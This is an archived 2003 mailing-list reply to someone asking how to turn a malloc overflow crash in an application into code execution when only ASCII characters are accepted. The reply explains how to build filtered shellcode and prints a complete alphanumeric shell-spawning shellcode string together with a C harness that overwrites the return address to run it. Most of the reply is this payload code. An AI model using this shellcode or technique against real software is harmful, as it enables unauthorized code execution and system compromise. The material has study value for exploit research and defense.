On Thu, Jun 12, 2003 at 11:20:00AM +0200, JohnnyRun wrote:
> This is my first post and I'm looking for some documentation.
> A friend of mine has produced a segfault with malloc vulnerability on an
> application.
> We would like to produce something more interesting.
> The field overflowed can accept only characters between 0 and 128. Any
> other character is replaced with a whitespace.
>
> Can we inject shellcode with only this characters avaible?
> Can you suggest me documentation about shellcode writing?
The simplest thing to do is to write a simple program that will run
a shell in C, and generate the assembly output for it with GCC -s,
this will give you a starting point.
After that you must filter out the opcodes and values which contain
invalid characters. Using add's etc will save you some effort.
Here's a simple sample:
char shellcode[] =
"DDDDTYTX3H01H01h03h0LLLLLLLLXPY3E01E01u03u0j0fXh8eshXf5VJPfhbi"
"fhDefXf5AJfPDTYhKATYX5KATYPQTUX3H01H01X03X0YRX3E01E03U0Jfh2GfX"
"f3E0f1E0f1U0fh88fX0E1f1E0f3E0fPTRX49HHHQfPfYRX2E00E0BRX0E02E02"
"L0z0L0zYRX4j4aGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG"
"GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG"
"GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG"
"GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG";
int main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
return 0;
}
Steve
--
Steve Kemp <steveat_private>
Intasys Billing Technologies Ltd
This archive was generated by hypermail 2b30 : Thu Jun 12 2003 - 18:20:35 PDT